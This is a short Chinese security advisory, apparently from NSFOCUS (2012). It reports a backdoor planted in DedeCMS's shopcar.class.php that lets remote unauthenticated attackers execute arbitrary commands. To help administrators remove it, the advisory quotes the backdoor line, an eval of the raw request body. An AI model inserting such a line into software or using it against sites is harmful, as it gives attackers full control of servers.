发布日期:2012-03-21
更新日期:2012-03-22
受影响系统:
dedecms dedecms 2.0
描述:
--------------------------------------------------------------------------------
DEDECMS是织梦内容管理系统,国内一款基于PHP+MySQL的技术开发的,支持多种服务器平台的PHP网站内容管理系统。
DedeCMS某些版本/include/shopcar.class.php文件中,被添加后门代码,远程未验证的攻击者利用该后门可以执行任意命令。
<*来源:jsbug
链接:
*>
建议:
--------------------------------------------------------------------------------
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
*直接找到站点include目录下shopcar.class.php文件,去掉里面的代码
@eval(file_get_contents('php://input'));即可。
厂商补丁:
dedecms
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: